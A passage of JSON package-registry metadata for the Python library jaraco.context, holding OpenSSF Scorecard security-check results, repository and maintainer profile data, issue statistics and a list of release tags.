uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.141Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/jaraco.context?arch=source\u0026distro=ubuntu-23.04\u0026repository_url=https://launchpad.net/ubuntu/lunar","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/jaraco.context/codemeta","maintainers":[],"registry":{"name":"ubuntu-23.04","url":"https://launchpad.net/ubuntu/lunar","ecosystem":"ubuntu","default":false,"packages_count":36116,"maintainers_count":0,"namespaces_count":4,"keywords_count":999,"github":"ubuntu","metadata":{"codename":"lunar","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":1100},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:49.117Z","updated_at":"2026-08-24T05:06:12.490Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/namespaces"}},{"id":12451962,"name":"py-jaraco-context","ecosystem":"spack","description":"Useful decorators and context managers.\n","homepage":"https://github.com/jaraco/jaraco.context","licenses":"[]","normalized_licenses":["Other"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2025-11-05T11:09:17.948Z","latest_release_published_at":"2026-05-05T21:04:16.719Z","latest_release_number":"6.1.2","last_synced_at":"2026-08-24T13:38:59.687Z","created_at":"2025-11-05T11:09:14.810Z","updated_at":"2026-08-24T13:38:59.688Z","registry_url":"https://packages.spack.io/package.html?name=py-jaraco-context","install_command":"spack install py-jaraco-context","documentation_url":null,"metadata":{},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jarac